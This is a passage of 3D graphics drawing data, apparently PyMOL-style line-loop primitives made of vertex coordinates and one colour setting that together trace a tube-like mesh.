VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.163, 36.829, 27.944,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.390, 37.152, 28.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.322, 36.783, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.396, 37.136, 28.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.320, 36.754, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.241, 37.156, 28.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.158, 36.759, 28.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.016, 37.199, 28.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 36.794, 28.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.772, 36.840, 28.337,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.721, 36.429, 28.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.774, 36.869, 28.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 22.731, 36.471, 28.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.936, 36.864, 27.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.936, 36.864, 27.947,
VERTEX, 22.899, 36.496, 27.989,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.936, 36.864, 27.947,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 23.163, 36.829, 27.944,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.129, 36.490, 27.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.163, 36.829, 27.944,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.322, 36.783, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.284, 36.455, 28.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.322, 36.783, 28.103,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.320, 36.754, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.275, 36.413, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.320, 36.754, 28.331,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.158, 36.759, 28.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.107, 36.388, 28.541,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.158, 36.759, 28.494,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 22.931, 36.794, 28.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.877, 36.395, 28.533,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.721, 36.429, 28.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.720, 35.923, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.721, 36.429, 28.368,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.731, 36.471, 28.143,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.781, 36.144, 27.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.731, 36.471, 28.143,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.899, 36.496, 27.989,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 22.981, 36.334, 27.253,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.899, 36.496, 27.989,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.129, 36.490, 27.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.204, 36.383, 27.281,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.129, 36.490, 27.997,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.284, 36.455, 28.162,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.319, 36.260, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.284, 36.455, 28.162,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.275, 36.413, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.258, 36.039, 28.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.275, 36.413, 28.387,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.107, 36.388, 28.541,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 23.058, 35.849, 29.428,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.107, 36.388, 28.541,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 22.877, 36.395, 28.533,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 22.877, 36.395, 28.533,
VERTEX, 22.835, 35.800, 29.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 22.720, 35.923, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.860, 35.482, 28.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.720, 35.923, 28.752,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 22.781, 36.144, 27.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.937, 35.757, 27.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.781, 36.144, 27.863,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 22.981, 36.334, 27.253,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.126, 36.035, 27.369,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.981, 36.334, 27.253,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.204, 36.383, 27.281,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.315, 36.153, 27.423,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.204, 36.383, 27.281,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.319, 36.260, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.394, 36.043, 28.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.319, 36.260, 27.929,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.258, 36.039, 28.818,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.316, 35.769, 28.951,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.258, 36.039, 28.818,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.058, 35.849, 29.428,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 23.127, 35.490, 29.530,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.058, 35.849, 29.428,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 22.835, 35.800, 29.401,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 22.835, 35.800, 29.401,
VERTEX, 22.938, 35.372, 29.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 22.860, 35.482, 28.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 23.153, 35.087, 28.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.860, 35.482, 28.821,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 22.937, 35.757, 27.948,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 23.239, 35.416, 28.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.937, 35.757, 27.948,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.126, 36.035, 27.369,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.393, 35.769, 27.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.126, 36.035, 27.369,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.315, 36.153, 27.423,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.524, 35.941, 27.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 36.153, 27.423,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.394, 36.043, 28.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.555, 35.829, 28.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.394, 36.043, 28.078,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.316, 35.769, 28.951,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.469, 35.500, 29.117,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.316, 35.769, 28.951,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.127, 35.490, 29.530,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 23.315, 35.147, 29.664,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.127, 35.490, 29.530,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 22.938, 35.372, 29.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 22.938, 35.372, 29.476,
VERTEX, 23.184, 34.975, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.153, 35.087, 28.926,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 23.540, 34.790, 29.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.153, 35.087, 28.926,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.239, 35.416, 28.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.627, 35.166, 28.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.239, 35.416, 28.073,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 23.393, 35.769, 27.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.741, 35.570, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.393, 35.769, 27.526,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 23.524, 35.941, 27.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.817, 35.765, 27.790,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 35.941, 27.605,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 23.555, 35.829, 28.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.810, 35.636, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.555, 35.829, 28.264,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 23.469, 35.500, 29.117,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.723, 35.259, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.469, 35.500, 29.117,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 23.315, 35.147, 29.664,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 23.609, 34.855, 29.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.315, 35.147, 29.664,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.184, 34.975, 29.585,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.184, 34.975, 29.585,
VERTEX, 23.533, 34.660, 29.705,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 23.540, 34.790, 29.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.959, 34.602, 29.163,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.540, 34.790, 29.048,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 23.627, 35.166, 28.215,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 24.037, 35.016, 28.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.627, 35.166, 28.215,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 23.741, 35.570, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 24.113, 35.451, 27.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.741, 35.570, 27.694,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 23.817, 35.765, 27.790,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 24.143, 35.653, 27.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.817, 35.765, 27.790,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 23.810, 35.636, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 24.109, 35.503, 28.601,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.810, 35.636, 28.447,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 23.723, 35.259, 29.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 24.031, 35.089, 29.417,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.723, 35.259, 29.280,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 23.609, 34.855, 29.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.954, 34.654, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.609, 34.855, 29.801,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 23.533, 34.660, 29.705,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 23.533, 34.660, 29.705,
VERTEX, 23.925, 34.452, 29.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 23.959, 34.602, 29.163,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 24.396, 34.504, 29.277,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.959, 34.602, 29.163,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.037, 35.016, 28.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 24.459, 34.945, 28.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.037, 35.016, 28.347,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.113, 35.451, 27.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 24.498, 35.400, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.113, 35.451, 27.844,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.143, 35.653, 27.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 24.489, 35.601, 28.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.143, 35.653, 27.949,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.109, 35.503, 28.601,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 24.438, 35.432, 28.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.109, 35.503, 28.601,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.031, 35.089, 29.417,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 24.375, 34.990, 29.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.031, 35.089, 29.417,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 23.954, 34.654, 29.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 24.336, 34.535, 30.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.954, 34.654, 29.920,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 23.925, 34.452, 29.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 23.925, 34.452, 29.815,
VERTEX, 24.345, 34.334, 29.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 24.779, 34.292, 30.038,
VERTEX, 24.396, 34.504, 29.277,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.779, 34.292, 30.038,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.839, 34.480, 29.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.396, 34.504, 29.277,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 24.459, 34.945, 28.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.883, 34.942, 28.606,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.459, 34.945, 28.475,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 24.498, 35.400, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.884, 35.407, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.498, 35.400, 27.985,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 24.489, 35.601, 28.095,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.842, 35.603, 28.237,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.489, 35.601, 28.095,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 24.438, 35.432, 28.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.782, 35.415, 28.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.438, 35.432, 28.740,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 24.375, 34.990, 29.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 24.738, 34.953, 29.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.375, 34.990, 29.543,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 24.336, 34.535, 30.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 24.737, 34.488, 30.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.336, 34.535, 30.033,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 24.345, 34.334, 29.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 24.345, 34.334, 29.923,
VERTEX, 24.779, 34.292, 30.038,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.779, 34.292, 30.038,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 24.839, 34.480, 29.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 25.278, 34.518, 29.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.839, 34.480, 29.399,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 24.883, 34.942, 28.606,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 25.298, 34.994, 28.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.883, 34.942, 28.606,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 24.884, 35.407, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 25.261, 35.463, 28.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.884, 35.407, 28.125,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 24.842, 35.603, 28.237,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 25.189, 35.650, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.842, 35.603, 28.237,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 24.782, 35.415, 28.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 25.124, 35.446, 29.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.782, 35.415, 28.877,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 24.738, 34.953, 29.669,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 25.104, 34.970, 29.806,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.738, 34.953, 29.669,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 24.737, 34.488, 30.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 25.141, 34.501, 30.282,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.737, 34.488, 30.150,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 24.779, 34.292, 30.038,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 24.779, 34.292, 30.038,
VERTEX, 25.213, 34.314, 30.170,
END,
COLOR, 0.000, 0.984, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 25.278, 34.518, 29.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 25.701, 34.608, 29.699,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.278, 34.518, 29.536,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 25.298, 34.994, 28.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 25.694, 35.092, 28.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.298, 34.994, 28.751,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 25.261, 35.463, 28.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 25.617, 35.558, 28.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.261, 35.463, 28.275,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.189, 35.650, 28.387,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 25.516, 35.733, 28.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.189, 35.650, 28.387,
VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.124, 35.446, 29.021,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 25.449, 35.514, 29.183,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.124, 35.446, 29.021,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.104, 34.970, 29.806,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 25.456, 35.029, 29.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.104, 34.970, 29.806,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.141, 34.501, 30.282,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 25.533, 34.563, 30.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.141, 34.501, 30.282,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.213, 34.314, 30.170,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.213, 34.314, 30.170,
VERTEX, 25.634, 34.389, 30.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 25.701, 34.608, 29.699,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 26.094, 34.741, 29.897,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.701, 34.608, 29.699,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 25.694, 35.092, 28.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 26.059, 35.229, 29.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.694, 35.092, 28.919,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 25.617, 35.558, 28.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.941, 35.685, 28.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.617, 35.558, 28.444,
VERTEX, 25.941, 35.685, 28.644,
VERTEX, 25.516, 35.733, 28.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.941, 35.685, 28.644,
